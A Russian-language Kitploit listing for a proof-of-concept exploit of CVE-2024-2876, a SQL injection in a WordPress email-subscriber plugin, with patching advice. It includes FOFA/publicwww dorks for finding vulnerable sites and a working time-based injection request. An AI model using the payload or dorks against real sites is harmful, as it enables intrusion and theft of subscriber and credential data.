Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-2876 — Эксплойт proof-of-concept для CVE-2024-2876, критической SQL-инъекции в плагине Email Subscribers от Icegram Express для WordPress, позволяющей неаутентифицированным атакующим выполнять произвольные SQL-запросы. | Kitploit
Инструменты/GitHubGitHub/aerchy/cve-2024-2876
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubaerchy/cve-2024-2876

CVE-2024-2876

Эксплойт proof-of-concept для CVE-2024-2876, критической SQL-инъекции в плагине Email Subscribers от Icegram Express для WordPress, позволяющей неаутентифицированным атакующим выполнять произвольные SQL-запросы.

Репозиторий
21 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-2876 - Уязвимость SQL-инъекции в Email Subscribers от Icegram Express

Обзор

CVE-2024-2876 — это критическая уязвимость безопасности, обнаруженная в плагине "Email Subscribers by Icegram Express" для WordPress. Эта уязвимость затрагивает версии до 5.7.14 включительно и представляет значительные риски для более чем 90 000 веб-сайтов.

Детали уязвимости

  • CVE-ID: CVE-2024-2876
  • CVSS Score: 9.8 (Критический)
  • Затронутые версии: До 5.7.14
  • Исправленная версия: 5.7.15 и выше

Описание

Уязвимость представляет собой дефект SQL-инъекции, который позволяет неаутентифицированным злоумышленникам выполнять вредоносные SQL-запросы в затронутых базах данных WordPress. Манипулируя пользовательскими вводами, которые не проходят надлежащую санитизацию, злоумышленники могут извлекать конфиденциальную информацию, такую как имена пользователей, адреса электронной почты, хэши паролей и списки подписчиков.

Механизм эксплуатации

SQL-инъекция возникает внутри функции run класса IG_ES_Subscribers_Query плагина, где недостаточная проверка ввода приводит к несанкционированному выполнению SQL-кода. Это ставит под угрозу целостность и конфиденциальность данных, хранящихся в базе данных WordPress.

Дорки CVE-2024-2876

  • FOFA : body="/wp-content/plugins/email-subscribers/"

  • publicwww : "/wp-content/plugins/email-subscribers/"

POC CVE-2024-2876

root@kitploit:~
POST /wp-admin/admin-post.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111

Рекомендации

  1. Немедленное обновление: Если вы используете плагин "Email Subscribers by Icegram Express", немедленно обновитесь до версии 5.7.15 или более поздней, чтобы применить исправление безопасности.

  2. Регулярные аудиты: Регулярно проверяйте и обновляйте все плагины и темы WordPress до их последних версий для обеспечения безопасности.

  3. Плагины безопасности: Используйте надежные плагины безопасности WordPress для усиления защиты от SQL-инъекций и других киберугроз.

  4. Политики надежных паролей: Внедряйте надежные и уникальные пароли для всех учетных записей, связанных с вашим сайтом WordPress, чтобы снизить риски несанкционированного доступа.

Последствия несоблюдения требований

Несвоевременное обновление затронутого плагина может оставить веб-сайты уязвимыми для утечек данных и несанкционированного доступа. Учитывая широкое распространение этого плагина, немедленные действия имеют решающее значение для защиты установок.

Скачать инструмент